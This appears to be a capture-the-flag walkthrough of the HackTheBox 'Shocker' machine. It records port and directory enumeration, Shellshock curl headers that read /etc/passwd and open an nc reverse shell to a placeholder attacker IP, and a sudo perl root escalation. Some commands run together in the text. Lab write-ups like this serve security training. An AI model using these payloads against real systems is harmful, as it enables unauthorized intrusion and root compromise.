HackTheBox: Shocker

3 min readMar 30, 2021
  1. Port scan
nmap -Pn -Pn -p1000-

There’re 2 open ports: 80 and 2222.

2. OS and service scan

nmap -A -p80,2222

3. Vuln scan

nmap --script vuln -p80,2222

4. nikto

nikto -h

5. gobuster and dirb

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,cgi -q

While waiting for gobuster forever I decided to use dirb instead


Further directory enumeration, starting w/ cgi-bin

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,cgi -q

There’s user.sh

6. Access HTTP Site

Nothing more

7. HTTP Shellshock

Since I have user.sh in cgi-bin, let’s test for shellshock

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"

Succeed. I can proceed to getting reverse shell

Prepare for listener

rlwrap nc -lvp 443

Get the reverse shell using these commands

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f'"

Back to the listener, I got the shell.

8. Privilege Escalation

Start w/ explore directory

cd /homels -lacd shellyls -la

I got user.txt

Another thing is .sudo_as_admin_successful

verify sudo

sudo -l

I can use perl.

Using guide from GTFOBins

sudo perl -e 'exec "/bin/sh";'
cd /rootls -la